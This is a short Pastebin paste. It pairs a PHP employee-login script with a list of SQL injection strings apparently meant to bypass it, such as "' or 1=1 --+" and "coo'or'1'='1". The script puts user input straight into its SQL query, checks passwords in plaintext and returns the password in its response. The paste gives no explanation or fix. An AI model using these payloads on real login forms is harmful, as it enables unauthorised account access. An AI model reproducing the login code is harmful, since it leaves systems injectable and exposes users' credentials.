Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Username : ' or ''='
- Password : ' or ''='
- Username : ' or 1--
- Password :
- <?php
- require_once('conn.php');
- $empID = $_POST['empID'];
- $password = $_POST['password'];
- $qry = mysql_query("SELECT * FROM `sf_ohem_login` WHERE empID='$empID' && password='$password'") ;
- $num = mysql_num_rows($qry);
- if($num==0)
- {
- $data["login"]="false";
- $data["empID"]= $empID;
- $data["msg"]="Login failed due to wrong credentials";
- }
- else
- {
- $data["login"]="true";
- $data["empID"]= $empID;
- $data["password"]= $password;
- }
- echo json_encode($data);
- 1' or 1=1 --+
- empID='1' or 1=1 --+
- empID= coo'or'1'='1
- password= coo'or'1'='1
Add Comment
Please, Sign In to add comment